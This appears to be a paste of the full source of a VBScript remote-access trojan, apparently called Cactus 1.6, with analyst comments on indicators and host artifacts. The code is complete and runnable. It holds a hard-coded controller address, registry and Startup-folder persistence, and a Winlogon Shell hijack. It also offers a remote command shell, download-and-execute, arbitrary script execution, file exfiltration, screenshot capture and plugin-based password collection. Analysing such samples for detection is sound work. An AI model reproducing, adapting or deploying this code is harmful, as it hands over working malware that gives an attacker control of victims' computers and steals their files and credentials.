Racco42

Untitled

Feb 28th, 2019
  ' Analyst note: configuration and start-up of a Windows Script Host (VBScript) remote-access script.
  ' Host and Port are the hard-coded controller endpoint used by Speak and SendFile (network indicators).
  ' wTime is the delay between polls; VER and cName are reported to the controller via ClientInfo/userID.
  1. On Error Resume Next
  2. Randomize
  3. Host = "185.198.26.245"
  4. Port = 8879
  5. wTime = 1500
  6. VER = "1.6"
  7. cName = "asw"
  ' COM objects used throughout: shell/registry access, file system access, and the HTTP client for check-ins.
  8. Set oWSH = CreateObject("WScript.Shell")
  9. Set oFSO = CreateObject("Scripting.FileSystemObject")
  10. Set oINT = CreateObject("MSXML2.xmlHTTP")
  ' "mutex" later holds an open handle on the installed script file (see SetInstance).
  11. Dim mutex
  ' NOTE(review): presumably leaves the script without a run-time limit - confirm against WSH documentation.
  12. WScript.Timeout = 0
  13. SelfPath = WScript.ScriptFullName
  14. SelfName = WScript.ScriptName
  ' Install location (%APPDATA%\) and the per-user / all-users Startup folders: file-system artifacts to check on a host.
  15. SetupDir = oWSH.ExpandEnvironmentStrings("%APPDATA%") & "\"
  16. Startup1 = oWSH.SpecialFolders("Startup") & "\"
  17. Startup2 = oWSH.SpecialFolders("AllUsersStartup") & "\"
  ' Installs persistence and relaunches from SetupDir before the polling loop starts.
  18. SetInstance
  ' Analyst note: polling / command-dispatch loop.
  ' Each iteration posts a "waiting" check-in through Speak and splits the reply on "{*}":
  ' RES(0) is the command name, RES(1) and RES(2) are its arguments. An empty reply means a 5 s sleep.
  ' Arguments come straight from the controller and are used without validation in every branch.
  ' Most branches answer with a second Speak call whose first argument echoes the command name,
  ' so the command vocabulary below is also visible in the outbound HTTP bodies.
  19. Do
  20. TTT = Speak("waiting",wTime)
  21. RES = Split(TTT, "{*}")
  22. If UBound(RES) = -1 Then
  23. WScript.Sleep 5000
  24. else
  25. Select Case RES(0)
  ' Controller-set poll interval; the value is later passed through Eval before sleeping.
  26. Case "sleep"
  27. wTime = RES(1)
  28. Case "stop"
  29. Speak "offline",""
  30. WScript.Quit
  ' Host reconnaissance: process list, drives, directory listing.
  31. Case "tasklist"
  32. Speak "tasklist",TaskList
  33. Case "getdrives"
  34. Speak "getdrives",GetDrives
  35. Case "getfiles"
  36. Speak "getfiles",GetFiles(RES(1))
  ' Process creation: taskkill.exe spawned hidden (window style 0) by wscript.exe, waited on (True).
  37. Case "taskkill"
  38. oWSH.Run "taskkill /T /F /IM " & chr(34) & RES(1) & chr(34), 0, True
  39. Speak "taskkill",""
  40. Case "voice"
  41. CreateObject("SAPI.SpVoice").Speak RES(1)
  42. Speak "voice",""
  43. Case "opencd"
  44. OpenCD
  45. Speak "opencd",""
  ' RES(1) is handed to WScript.Shell.Run unmodified, so whatever the controller sends is what gets launched.
  46. Case "openweb"
  47. oWSH.Run RES(1)
  48. Speak "openweb",""
  49. Case "getservices"
  50. Speak "getservices",GetServices
  51. Case "uninstall"
  52. Call Uninstall
  ' Command execution through %comspec% /c; output is returned in the reply body.
  53. Case "remoteshell"
  54. Speak "remoteshell",RemoteShell(RES(1))
  ' Releases the file handle and starts a fresh wscript.exe //B instance of the installed copy.
  55. Case "reset"
  56. mutex.Close
  57. oWSH.Run "wscript.exe //B " & chr(34) & SetupDir & SelfName & Chr(34)
  58. Speak "reset",""
  59. WScript.Quit
  60. Case "exefile"
  61. oWSH.Run chr(34) & Trim(RES(1)) & chr(34)
  62. Speak "exefile",""
  63. Case "mkdir"
  64. oFSO.CreateFolder Trim(RES(1))
  65. Speak "mkdir",""
  ' Both DeleteFile and DeleteFolder are called on the same path; errors are suppressed by On Error Resume Next.
  66. Case "killfile"
  67. oFSO.DeleteFile Trim(RES(1))
  68. oFSO.DeleteFolder Trim(RES(1))
  69. Speak "killfile",""
  70. Case "getparent"
  71. Speak "getfiles",GetFiles(oFSO.GetParentFolderName(RES(1)))
  ' Download-and-execute: RES(1) is a URL, RES(2) the file extension (see DownRun).
  72. Case "downrun"
  73. DownRun RES(1),RES(2)
  74. Speak "downrun",""
  ' Self-update: the installed script in SetupDir is overwritten (mode 2 = write) with decoded controller
  ' content and relaunched, so the on-disk file can change between collections of the same host.
  75. Case "update"
  76. mutex.Close
  77. set mutex = oFSO.OpenTextFile(SetupDir & SelfName, 2, False)
  78. mutex.write fileDecode(RES(1))
  79. mutex.Close
  80. Speak "",""
  81. Speak "update",""
  82. oWSH.Run "wscript.exe //B " & chr(34) & SetupDir & SelfName & Chr(34)
  83. WScript.Quit
  ' File exfiltration (sendfile) and file drop (recvfile); a "|plug|" marker in the argument selects the
  ' plugin reply "plugin-ok".
  84. Case "sendfile"
  85. SendFile(Trim(RES(1)))
  86. Case "recvfile"
  87. RecvFile(RES(1))
  88. Speak "",""
  89. If InStr(RES(1),"|plug|") > 0 Then
  90. Speak "plugin-ok",""
  91. Else
  92. Speak "recvfile",""
  93. End If
  94. Case "uprun"
  95. UpRun(RES(1))
  96. Speak "",""
  97. Speak "uprun",""
  ' Service control through net.exe, run hidden (window style 0).
  98. Case "netstart"
  99. oWSH.Run "net start " & Trim(RES(1)),0
  100. Speak "netstart",""
  101. Case "netstop"
  102. oWSH.Run "net stop " & Trim(RES(1)),0
  103. Speak "netstop",""
  104. Case "renfile"
  105. Set tFile = oFSO.GetFile(Trim(RES(1)))
  106. tFile.Name = Trim(RES(2))
  107. Speak "renfile",""
  108. Case "rendir"
  109. Set tFolder = oFSO.GetFolder(Trim(RES(1)))
  110. tFolder.Name = Trim(RES(2))
  111. Speak "rendir",""
  ' Controller-supplied VBScript is decoded and run with "execute" inside this process; this branch
  ' writes nothing to disk itself, so evidence is limited to network capture and script-host telemetry.
  112. Case "runvbs"
  113. execute fileDecode(RES(1))
  114. Speak "runvbs",""
  ' Forced, immediate shutdown / reboot via shutdown.exe.
  115. Case "shutdown"
  116. oWSH.Run "shutdown /s /f /t 00"
  117. Speak "shutdown",""
  118. Case "reboot"
  119. oWSH.Run "shutdown /r /f /t 00"
  120. Speak "reboot",""
  ' Plugin-backed commands: each relies on an executable previously dropped into SetupDir.
  121. Case "takescreen"
  122. TakeScreen
  123. Case "msgbox"
  124. fBox(RES(1))
  125. Case "getpwd"
  126. GetPWD
  127. End Select
  ' wTime may have been replaced by the "sleep" command; Eval evaluates it as an expression before the sleep.
  128. WScript.Sleep Eval(wTime)
  129. End If
  130. Loop
  ' Analyst note: check-in / reply channel.
  ' Sends a synchronous (third Open argument False) HTTP POST to "http://" & Host & ":" & Port and
  ' returns the response text, which the main loop parses as the next command.
  ' Body layout: "::" & ClientInfo & "::" & A & "::" & fileEncode(B) & "::<:end:>"
  '   A = message/command name, B = payload (encoded by fileEncode as decimal character codes).
  ' Network indicators visible here: plain HTTP, the fixed User-Agent string "Cactus/1.6",
  ' and the "::" ... "::<:end:>" framing of the POST body.
  131. Function Speak(A, B)
  132. On Error Resume Next
  133. oINT.Open "post", "http://" & Host & ":" & Port , False
  134. oINT.setRequestHeader "User-Agent", "Cactus/1.6"
  135. oINT.Send "::" & ClientInfo & "::" & A & "::" & fileEncode(B) & "::<:end:>"
  136. Speak = oINT.ResponseText
  137. End Function
  ' Analyst note: installation and persistence.
  ' Registry: writes a value named after the script's base name (Split(SelfName,".")(0)) under
  '   HKCU\...\CurrentVersion\Run, HKLM\...\CurrentVersion\Run and HKCU\...\Policies\Explorer\Run,
  '   and overwrites HKLM\...\Winlogon\Shell with "Explorer.exe, wscript.exe //B <path>".
  '   All four point at the copy in SetupDir and launch it with "wscript.exe //B".
  ' Files: copies itself into SetupDir and both Startup folders (overwrite = True).
  ' Hunting / cleanup checklist derived from this routine: the three Run values, a Winlogon Shell
  ' value that is not just Explorer.exe, and the three file copies.
  138. Function SetInstance
  139. On Error Resume Next
  140. oWSH.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(SelfName,".")(0), "wscript.exe //B " & chrw(34) & SetupDir & SelfName & chrw(34)
  141. oWSH.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(SelfName,".")(0), "wscript.exe //B " & chrw(34) & SetupDir & SelfName & chrw(34)
  142. oWSH.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\" & Split(SelfName,".")(0), "wscript.exe //B " & chrw(34) & SetupDir & SelfName & chrw(34)
  143. oWSH.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe, " & "wscript.exe //B " & chrw(34) & SetupDir & SelfName & chrw(34)
  ' Registry errors are discarded here, so only a failure in the file copies below makes the script quit.
  144. Err.Clear
  145. oFSO.CopyFile SelfPath, SetupDir & SelfName, True
  146. oFSO.CopyFile SelfPath, Startup1 & SelfName, True
  147. oFSO.CopyFile SelfPath, Startup2 & SelfName, True
  148. If err.number > 0 Then WScript.Quit
  ' If the running copy is not the one in SetupDir, start that copy and exit this one.
  149. set SFNS = oFSO.GetFile(SelfPath)
  150. set IFNS = oFSO.GetFile(SetupDir & SelfName)
  151. If LCase(SFNS.ShortPath) <> LCase(IFNS.ShortPath) Then
  152. oWSH.Run "wscript.exe //B " & chr(34) & SetupDir & SelfName & Chr(34)
  153. WScript.Quit
  154. End If
  ' Opens the installed script for appending (mode 8) and keeps the handle in the global "mutex".
  ' NOTE(review): presumably used as a single-instance / file-lock marker - the handle is closed
  ' before reset, update and uninstall; confirm on a live sample.
  155. Set mutex = oFSO.OpenTextFile(SetupDir & SelfName, 8, False)
  156. End Function
  ' Analyst note: self-removal, mirroring SetInstance.
  ' Closes the file handle, deletes the three Run values, resets Winlogon\Shell to "Explorer.exe",
  ' deletes the copies in SetupDir and both Startup folders, reports "uninstalled" and quits.
  ' Not touched by this routine: plugin files that other commands place in SetupDir
  ' (scr-plugin.exe, pwd-plugin.exe, adv-plugin.exe and their output files), so those can remain
  ' on a host after a controller-initiated uninstall.
  157. Function Uninstall
  158. On Error Resume Next
  159. mutex.Close
  160. oWSH.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(SelfName,".")(0)
  161. oWSH.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(SelfName,".")(0)
  162. oWSH.RegDelete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\" & Split(SelfName,".")(0)
  163. oWSH.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "Explorer.exe"
  164. oFSO.DeleteFile SetupDir & SelfName, True
  165. oFSO.DeleteFile Startup1 & SelfName, True
  166. oFSO.DeleteFile Startup2 & SelfName, True
  167.  
  168. Speak "uninstalled",""
  169. WScript.Quit
  170. End Function
  ' Analyst note: host profile included in every POST body (Speak and SendFile).
  ' Fields, joined with "(*)": userID, %USERNAME%, %COMPUTERNAME%, OS caption (osName), VER,
  ' installed antivirus names (osAV), and a local timestamp built as D/M/YYYY H:M:S.
  ' The "(*)" separator and field order are usable for parsing captured traffic.
  171. Function ClientInfo
  172. On Error Resume Next
  173. tmp = ""
  174. tmp = tmp & userID & "(*)"
  175. tmp = tmp & oWSH.ExpandEnvironmentStrings("%USERNAME%") & "(*)"
  176. tmp = tmp & oWSH.ExpandEnvironmentStrings("%COMPUTERNAME%") & "(*)"
  177. tmp = tmp & osName & "(*)"
  178. tmp = tmp & VER & "(*)"
  179. tmp = tmp & osAV & "(*)"
  180. tmp = tmp & Day(Now) & "/" & Month(Now) & "/" & Year(Now) & " " & Hour(Now) & ":" & Minute(Now) & ":" & Second(Now)
  181. ClientInfo = tmp
  182. End Function
  ' Analyst note: per-host identifier.
  ' Input string = first non-empty VolumeSerialNumber from Win32_LogicalDisk, followed by
  ' %USERNAME% and %COMPUTERNAME%. Each character is converted with Hex(Oct(Asc(c))), the result is
  ' truncated to 15 characters and prefixed with cName & "_".
  ' The identifier is therefore stable for a given host/user and carries the campaign tag from cName.
  183. Function userID
  184. On Error Resume Next
  185. usrStr = oWSH.ExpandEnvironmentStrings("%USERNAME%") & oWSH.ExpandEnvironmentStrings("%COMPUTERNAME%")
  186. Set WMI = GetObject("winmgmts:\\.\root\cimv2")
  187. set D1 = WMI.ExecQuery ("select * from win32_logicaldisk")
  188. for each D2 in D1
  189. if D2.VolumeSerialNumber <> "" then
  190. H = D2.VolumeSerialNumber
  191. exit for
  192. end if
  193. next
  194. tmp = ""
  195. usrStr = H & usrStr
  196. for i = 1 to Len(usrStr)
  197. tmp = tmp & Hex(Oct(Asc(Mid(usrStr,i,1))))
  198. next
  199. if Len(tmp) > 15 then tmp = Left(tmp,15)
  200. userID = cName & "_" & tmp
  201. End Function
  ' Analyst note: returns the trimmed Caption of the first Win32_OperatingSystem instance
  ' (empty string if the WMI query yields nothing); reported to the controller via ClientInfo.
  202. Function osName
  203. On Error Resume Next
  204. Set WMI = GetObject("winmgmts:\\.\root\cimv2")
  205. set O1 = WMI.execquery ("select * from win32_operatingsystem")
  206. tmp = ""
  207. for each O2 in O1
  208. tmp = Trim(O2.caption)
  209. exit for
  210. next
  211. osName = tmp
  212. End Function
  ' Analyst note: security-product discovery.
  ' Reads the OS major version, then queries AntiVirusProduct in root\securitycenter2 (major > 5)
  ' or root\securitycenter (otherwise) and returns the displayName values joined with "+",
  ' or "Not Found" when the query returns nothing.
  ' A script host querying the SecurityCenter WMI namespace is a useful telemetry signal for this behavior.
  213. Function osAV
  214. On Error Resume Next
  215. osAV = ""
  216. Set WMI = getobject("winmgmts:\\.\root\cimv2")
  217. Set P = WMI.execquery("SELECT * from win32_operatingsystem",,48)
  218. For Each C In P
  219. osVer = Split(C.version,".")(0)
  220. Next
  221. If osVer > 5 Then tmp = "securitycenter2" Else tmp = "securitycenter"
  222. Set WMI2 = getobject("winmgmts:\\localhost\root\" & tmp)
  223. Set Q = WMI2.execquery("SELECT * from antivirusproduct","wql",0)
  224. For Each W In Q
  225. osAV = osAV & W.displayname & "+"
  226. Next
  227. If osAV = "" Then osAV = "Not Found+"
  ' Strips the trailing "+" separator.
  228. osAV = Mid(osAV, 1, Len(osAV) - 1)
  229. End Function
  ' Analyst note: process discovery via WMI (Win32_Process).
  ' Returns one record per process as Name|ExecutablePath|ProcessID, records separated by "<>".
  230. Function TaskList
  231. On Error Resume Next
  232. set WMI = getobject("winmgmts:\\.\root\cimv2")
  233. set P1 = WMI.execquery("select * from win32_process",,48)
  234. tmp = ""
  235. for each P2 in P1
  236. tmp = tmp & P2.Name & "|"
  237. tmp = tmp & P2.ExecutablePath & "|"
  238. tmp = tmp & P2.ProcessID & "<>"
  239. next
  240. TaskList = tmp
  241. End function
  ' Analyst note: drive discovery.
  ' Returns Path|DriveType for every drive that reports IsReady, records separated by "<>".
  242. Function GetDrives
  243. On Error Resume Next
  244. GetDrives = ""
  245. For Each drive In oFSO.drives
  246. If drive.isready = True Then
  247. GetDrives = GetDrives & drive.path & "|" & drive.drivetype & "<>"
  248. End If
  249. Next
  250. End Function
  ' Analyst note: directory listing of the controller-supplied path D.
  ' Output starts with D & "<>", then one record per subfolder (name|<DIR>|d|attributes) and
  ' one per file (name|size|f|attributes), each terminated by "<>".
  251. Function GetFiles(D)
  252. On Error Resume Next
  253. GetFiles = D & "<>"
  254. For Each folder In oFSO.getfolder(D).subfolders
  255. GetFiles = GetFiles & folder.name & "|" & "<DIR>" & "|" & "d" & "|" & folder.attributes & "<>"
  256. Next
  257. For Each file In oFSO.getfolder(D).files
  258. GetFiles = GetFiles & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & "<>"
  259. Next
  260. End Function
  ' Analyst note: nuisance feature - invokes the "Eject" verb on every drive whose DriveType is 4
  ' (the FileSystemObject value for CD-ROM), through Shell.Application's Namespace(17).
  ' No data is collected or returned by this routine.
  261. Function OpenCD
  262. On Error Resume Next
  263. For Each D in oFSO.Drives
  264. WScript.sleep 50
  265. If D.DriveType = 4 Then CreateObject("Shell.Application").Namespace(17).ParseName(D.DriveLetter & ":\").InvokeVerb("Eject")
  266. Next
  267. End Function
  ' Analyst note: service discovery via WMI (Win32_Service).
  ' Returns Name|Caption|PathName|StartMode|State per service, records separated by "<>".
  ' The query flags &h10 + &h20 equal 48, the same value the other WMI queries in this script pass.
  268. Function GetServices
  269. On Error Resume Next
  270. GetServices = ""
  271. Set WMI = GetObject("winmgmts:\\.\root\CIMV2")
  272. Set P = WMI.ExecQuery("SELECT * FROM Win32_Service", "WQL", &h10 + &h20)
  273. For Each objItem In P
  274. GetServices = GetServices & objItem.Name & "|" & objItem.Caption & "|" & objItem.PathName & "|" & objItem.StartMode & "|" & objItem.State & "<>"
  275. Next
  276. End Function
  ' Analyst note: arbitrary command execution.
  ' Runs "%comspec% /c " & C with WScript.Shell.Exec and returns stdout if it has content,
  ' otherwise stderr, otherwise the literal "<error>".
  ' Host telemetry: the command interpreter spawned as a child of wscript.exe, with the
  ' controller-supplied command on its command line.
  277. Function RemoteShell(C)
  278. On Error Resume Next
  279. Set xCMD = oWSH.exec("%comspec% /c " & C)
  280. If Not xCMD.stdOut.AtendOfStream Then
  281. R = xCMD.stdOut.ReadAll
  282. ElseIf Not xCMD.stdErr.AtendOfStream Then
  283. R = xCMD.stdErr.ReadAll
  284. else
  285. R = "<error>"
  286. end if
  287. RemoteShell = R
  288. End Function
  ' Analyst note: download-and-execute.
  ' x = URL fetched with WinHttp.WinHttpRequest.5.1 (a second HTTP client, separate from oINT);
  ' y = extension appended to a GetTempName-generated file name under %TMP%.
  ' The body is written as binary (stream Type 1, overwrite mode 2) only when the status is 200;
  ' the Run call on the file's short path follows regardless of the status check.
  ' Host artifacts: a new file in %TMP% with a generated name plus "." & y, and a process started
  ' from that path by wscript.exe.
  289. Function DownRun(x,y)
  290. On Error Resume Next
  291. Set oHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
  292. Set oStream = CreateObject("ADODB.Stream")
  293. oHTTP.Open "GET", x, False
  294. oHTTP.Send
  295. T = oWSH.ExpandEnvironmentStrings("%TMP%") & "\" & oFSO.GetTempName & "." & y
  296. If (oHTTP.Status = 200) Then
  297. oStream.Open
  298. oStream.Type = 1
  299. oStream.Write oHTTP.ResponseBody
  300. oStream.SaveToFile T, 2
  301. oStream.Close
  302. End If
  303. oWSH.Run oFSO.GetFile(T).ShortPath
  304. End Function
  ' Analyst note: upload-and-execute.
  ' A is "<file name><>" followed by base64 data. The data is decoded through an MSXML
  ' "bin.base64" element, written to %TMP%\<file name> (overwrite mode 2) and launched.
  ' Host artifacts: a controller-named file in %TMP% and a process started from it by wscript.exe.
  305. Function UpRun(A)
  306. On Error Resume Next
  307. T = Split(A,"<>")
  308. fUpRun = oWSH.ExpandEnvironmentStrings("%TMP%") & "\" & T(0)
  309. Set objXML = CreateObject("MSXml2.DOMDocument")
  310. Set objDocElem = objXML.createElement("Base64Data")
  311. objDocElem.dataType = "bin.base64"
  312. objDocElem.Text = T(1)
  313. Set objStream = CreateObject("ADODB.Stream")
  314. objStream.Type = 1
  315. objStream.Open
  316. objStream.Write objDocElem.nodeTypedValue
  317. objStream.SaveToFile fUpRun, 2
  318. oWSH.Run chr(34) & fUpRun & chr(34)
  319. End Function
  ' Analyst note: file drop (no execution in this routine).
  ' A splits on "<>" into T(0) = destination prefix or the marker "|plug|", T(1) = file name,
  ' T(2) = base64 content. With the "|plug|" marker the file is written into SetupDir - this is
  ' how the *-plugin.exe helpers used by TakeScreen, GetPWD and fBox would arrive; otherwise the
  ' destination is T(0) & T(1), i.e. any path the controller chooses.
  320. Function RecvFile(A)
  321. On Error Resume Next
  322. T = Split(A,"<>")
  323. Set objXML = CreateObject("MSXml2.DOMDocument")
  324. Set objDocElem = objXML.createElement("Base64Data")
  325. objDocElem.dataType = "bin.base64"
  326. objDocElem.Text = T(2)
  327. Set objStream = CreateObject("ADODB.Stream")
  328. objStream.Type = 1
  329. objStream.Open
  330. objStream.Write objDocElem.nodeTypedValue
  331. If T(0) = "|plug|" Then
  332. objStream.SaveToFile SetupDir & T(1), 2
  333. Else
  334. objStream.SaveToFile T(0) & T(1), 2
  335. End If
  336. End Function
  ' Analyst note: file exfiltration.
  ' Reads the file at path A as binary, base64-encodes it through an MSXML "bin.base64" element and
  ' POSTs it to the same Host:Port as Speak.
  ' Body layout: "::" & ClientInfo & "::sendfile::" & A & "<>" & <base64> & "::<:end:>"
  ' - the local path of the stolen file is sent in clear alongside the data.
  ' Unlike Speak, this routine sets no User-Agent header, so a network rule keyed only on the
  ' "Cactus/1.6" string would not be expected to match these requests; the body framing still applies.
  337. Function SendFile(A)
  338. On Error Resume Next
  339. Set objStream = CreateObject("ADODB.Stream")
  340. objStream.Type = 1
  341. objStream.Open()
  342. objStream.LoadFromFile(A)
  343. Set objXML = CreateObject("MSXml2.DOMDocument")
  344. Set objDocElem = objXML.createElement("Base64Data")
  345. objDocElem.dataType = "bin.base64"
  346. objDocElem.nodeTypedValue = objStream.Read()
  347. B = objDocElem.text
  348. oINT.Open "post", "http://" & Host & ":" & Port , False
  349. oINT.Send "::" & ClientInfo & "::sendfile::" & A & "<>" & B & "::<:end:>"
  350. End Function
  ' Analyst note: screenshot capture through an external plugin.
  ' Launches SetupDir & "scr-plugin.exe", then checks up to 10 times (500 ms apart) for
  ' SetupDir & "scr-plugin.jpg"; when present the image is exfiltrated with SendFile and deleted,
  ' and wTime is set to 1. If the file never appears, "no-scr" is reported.
  ' The plugin binary is not part of this page; its file names are host artifacts to look for in %APPDATA%.
  351. Function TakeScreen
  352. On Error Resume Next
  353. oWSH.Run SetupDir & "scr-plugin.exe"
  354. For i = 1 to 10
  355. If oFSO.FileExists(SetupDir & "scr-plugin.jpg") = True Then
  356. wTime = 1
  357. SendFile(SetupDir & "scr-plugin.jpg")
  358. oFSO.DeleteFile(SetupDir & "scr-plugin.jpg")
  359. Exit Function
  360. Else
  361. WScript.Sleep 500
  362. End If
  363. Next
  364. Speak "no-scr",""
  365. End Function
  ' Analyst note: plugin-backed collection.
  ' If SetupDir & "pwd-plugin.exe" exists it is launched, and SetupDir & "pwd-plugin.txt" is polled
  ' up to 10 times (500 ms apart); the output file is exfiltrated with SendFile and then deleted.
  ' Status strings: "error-pwd" (plugin ran, no output file), "no-pwd" (plugin not present).
  ' NOTE(review): the names suggest credential harvesting, but the plugin is not on this page -
  ' confirm from the binary before scoping credential resets.
  366. Function GetPWD
  367. On Error Resume Next
  368. If oFSO.FileExists(SetupDir & "pwd-plugin.exe") = True Then
  369. oWSH.Run SetupDir & "pwd-plugin.exe"
  370. For i = 1 to 10
  371. If oFSO.FileExists(SetupDir & "pwd-plugin.txt") = True Then
  372. SendFile(SetupDir & "pwd-plugin.txt")
  373. oFSO.DeleteFile(SetupDir & "pwd-plugin.txt")
  374. Exit Function
  375. Else
  376. WScript.Sleep 500
  377. End If
  378. Next
  379. Speak "error-pwd",""
  380. Else
  381. Speak "no-pwd",""
  382. End If
  383. End Function
  ' Analyst note: handler for the "msgbox" command, backed by an external plugin.
  ' If SetupDir & "adv-plugin.exe" exists, any running adv-plugin.exe is force-killed (hidden,
  ' waited on), then the plugin is started with the controller-supplied argument string A.
  ' Reports "msgbox" on launch or "no-adv" when the plugin file is absent.
  384. Function fBox(A)
  385. On Error Resume Next
  386. If oFSO.FileExists(SetupDir & "adv-plugin.exe") = True Then
  387. oWSH.Run "taskkill /T /F /IM adv-plugin.exe", 0, True
  388. WScript.Sleep 100
  389. oWSH.Run SetupDir & "adv-plugin.exe " & A
  390. Speak "msgbox",""
  391. Else
  392. Speak "no-adv",""
  393. End If
  394. End Function
  ' Analyst note: wire encoding for outbound payloads (used by Speak).
  ' Each character of A becomes its decimal Asc() code followed by "|", e.g. a two-character input
  ' yields "<code1>|<code2>|". This is an encoding, not encryption: captured bodies can be
  ' decoded by splitting on "|" and mapping the numbers back to characters.
  395. Function fileEncode(A)
  396. T = ""
  397. For i = 1 To Len(A)
  398. T = T & Asc(Mid(A, i, 1)) & "|"
  399. Next
  400. fileEncode = T
  401. End Function
  ' Analyst note: inverse of fileEncode, applied to controller-supplied content in the
  ' "update" and "runvbs" commands.
  ' Splits A on "|" and converts each number with Chr(); the loop stops at UBound(B) - 1, which
  ' skips the empty element that follows the final "|" separator.
  402. Function fileDecode(A)
  403. C = ""
  404. B = Split(A,"|")
  405. For i = 0 to Ubound(B) -1
  406. C = C & Chr(B(i))
  407. Next
  408. fileDecode = C
  409. End Function